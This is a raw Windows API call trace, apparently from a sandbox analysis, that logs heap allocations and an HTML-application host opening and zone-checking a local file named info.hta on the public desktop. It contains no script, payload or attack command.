1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.816] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.817] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54bc00 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.818] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54bb00 | out: hHeap=0x510000) returned 1 [0226.819] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.819] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.819] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54ba88 | out: hHeap=0x510000) returned 1 [0226.819] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54b5e0 | out: hHeap=0x510000) returned 1 [0226.819] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.819] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54ba48 | out: hHeap=0x510000) returned 1 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x34) returned 0x54f7e8 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x70) returned 0x5507b0 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xf8) returned 0x552fb0 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8b4) returned 0x580868 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b5e0 [0226.819] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b5c8 [0226.819] IsCharSpaceW (wch=0x48) returned 0 [0226.819] IsCharAlphaNumericW (ch=0x5c) returned 0 [0226.819] IsCharSpaceW (wch=0x5c) returned 0 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x533498 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x54de88 [0226.819] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x533438 [0226.820] IsCharSpaceW (wch=0x41) returned 0 [0226.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x54b628 [0226.820] IsCharAlphaNumericW (ch=0x20) returned 0 [0226.820] IsCharSpaceW (wch=0x20) returned 1 [0226.820] IsCharSpaceW (wch=0x7b) returned 0 [0226.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x541988 [0226.820] IsCharSpaceW (wch=0x20) returned 1 [0226.820] IsCharAlphaNumericW (ch=0x7b) returned 0 [0226.820] IsCharSpaceW (wch=0x62) returned 0 [0226.820] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54de88 | out: hHeap=0x510000) returned 1 [0226.820] IsCharAlphaNumericW (ch=0x3a) returned 0 [0226.820] IsCharSpaceW (wch=0x3a) returned 0 [0226.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x541960 [0226.820] IsCharAlphaNumericW (ch=0x3a) returned 0 [0226.820] IsCharSpaceW (wch=0x75) returned 0 [0226.820] IsCharAlphaNumericW (ch=0x28) returned 0 [0226.820] IsCharSpaceW (wch=0x28) returned 0 [0226.820] IsCharAlphaNumericW (ch=0x28) returned 0 [0226.820] IsCharSpaceW (wch=0x23) returned 0 [0226.820] IsCharSpaceW (wch=0x23) returned 0 [0226.820] IsCharSpaceW (wch=0x7d) returned 0 [0226.820] IsCharAlphaNumericW (ch=0x7d) returned 0 [0226.820] IsCharSpaceW (wch=0x29) returned 0 [0226.820] IsCharSpaceW (wch=0x75) returned 0 [0226.820] IsCharSpaceW (wch=0x75) returned 0 [0226.820] IsCharSpaceW (wch=0x29) returned 0 [0226.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x533458 [0226.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x34) returned 0x54f8e8 [0226.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x40) returned 0x524090 [0226.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b610 [0226.820] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x54b5f8 [0226.820] CoTaskMemFree (pv=0x54a928) [0226.820] CoTaskMemFree (pv=0x5847c0) [0226.840] IUnknown:Release (This=0x53c14c) returned 0xa [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.840] IUnknown:Release (This=0x53c14c) returned 0x9 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x554270 | out: hHeap=0x510000) returned 1 [0226.840] IUnknown:Release (This=0x53c14c) returned 0x8 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x52d7e0 | out: hHeap=0x510000) returned 1 [0226.840] IUnknown:Release (This=0x53c14c) returned 0x7 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x552e78 | out: hHeap=0x510000) returned 1 [0226.840] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5530d8 | out: hHeap=0x510000) returned 1 [0226.840] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14de14 | out: ppURI=0x14de14*=0x53c4ac) returned 0x0 [0226.840] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14ddec | out: ppvObject=0x14ddec*=0x53c4ac) returned 0x0 [0226.841] IUnknown:Release (This=0x53c4ac) returned 0xb [0226.841] IUnknown:AddRef (This=0x53c4ac) returned 0xc [0226.841] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x52) returned 0x550a20 [0226.841] IUnknown:Release (This=0x53c4ac) returned 0xb [0226.841] IUnknown:Release (This=0x53c4ac) returned 0xa [0226.841] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x100) returned 0x581128 [0226.841] FindResourceW (hModule=0x71da0000, lpName=0x1fe, lpType=0x6) returned 0x2e084d0 [0226.841] LoadResource (hModule=0x71da0000, hResInfo=0x2e084d0) returned 0x2e2e53c [0226.841] LockResource (hResData=0x2e2e53c) returned 0x2e2e53c [0226.841] VirtualQuery (in: lpAddress=0x2e2e53c, lpBuffer=0x14efbc, dwLength=0x1c | out: lpBuffer=0x14efbc*(BaseAddress=0x2e2e000, AllocationBase=0x2b50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0226.841] SizeofResource (hModule=0x71da0000, hResInfo=0x2e084d0) returned 0xe6 [0226.841] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x550a20 | out: hHeap=0x510000) returned 1 [0226.841] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x581128, Size=0x70) returned 0x581128 [0226.841] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x74) returned 0x5220c0 [0226.841] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14f178 | out: ppu=0x14f178) returned 0x0 [0226.841] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.841] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.841] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.841] StrCmpNICW (lpStr1="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.841] StrStrIW (lpFirst="", lpSrch="http://www.w3.org/TR/REC-html40/strict.dtd") returned 0x0 [0226.842] StrStrIW (lpFirst="", lpSrch="DTD XHTML") returned 0x0 [0226.842] StrStrIW (lpFirst="", lpSrch="DTD HTML 4") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.842] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0226.842] StrStrIW (lpFirst="", lpSrch="DTD XHTML 1.0") returned 0x0 [0226.842] StrStrIW (lpFirst="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.842] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0226.842] StrStrIW (lpFirst="", lpSrch=" Transitional//") returned 0x0 [0226.842] StrStrIW (lpFirst="", lpSrch=" Frameset//") returned 0x0 [0226.842] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54a928 | out: hHeap=0x510000) returned 1 [0226.842] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x34) returned 0x54f928 [0226.842] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54df38 [0226.842] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x553278 [0226.842] GetTickCount () returned 0x209ee [0226.842] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.842] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x54e358 [0226.842] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0226.842] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14f164, dwFlags=0x0 | out: pdwZone=0x14f164*=0xffffffff) returned 0x800c0011 [0226.842] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.842] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.842] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.842] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", dwAction=0x2106, pPolicy=0x14f168, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x14f168*=0x0) returned 0x0 [0226.842] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.842] IUnknown:Release (This=0x53c65c) returned 0x2 [0226.842] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x553278 | out: hHeap=0x510000) returned 1 [0226.843] GetTickCount () returned 0x209ee [0226.843] GetTickCount () returned 0x209ee [0226.843] GetCurrentThreadId () returned 0xc4 [0226.843] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x52d7e0 | out: hHeap=0x510000) returned 1 [0226.843] GetCurrentThreadId () returned 0xc4 [0226.843] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x553278 | out: hHeap=0x510000) returned 1 [0226.843] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54e510 | out: hHeap=0x510000) returned 1 [0226.843] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x55cc18 | out: hHeap=0x510000) returned 1 [0226.843] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.843] GetTickCount () returned 0x209ee [0226.843] GetTickCount () returned 0x209ee [0226.887] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0226.887] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0xc) returned 0x553278 [0226.887] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1c) returned 0x56b4d0 [0226.887] StrCmpNICW (lpStr1="on", lpStr2="Sy", nChar=2) returned -4 [0226.887] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2a) returned 0x52d7e0 [0226.887] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8) returned 0x55e6d8 [0226.887] StrCmpNICW (lpStr1="on", lpStr2="SI", nChar=2) returned -4 [0226.887] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x16) returned 0x5334b8 [0226.887] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x55a960 [0226.887] StrCmpNICW (lpStr1="on", lpStr2="IC", nChar=2) returned 6 [0226.887] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0226.888] StrCmpICW (pszStr1="PUBLIC", pszStr2="HTA") returned 8 [0226.888] StrCmpICW (pszStr1="HTA", pszStr2="HTA") returned 0 [0226.888] StrCmpICW (pszStr1="APPLICATION", pszStr2="APPLICATION") returned 0 [0226.951] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x54e510 [0226.951] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x10) returned 0x553290 [0226.951] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.951] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x54e460 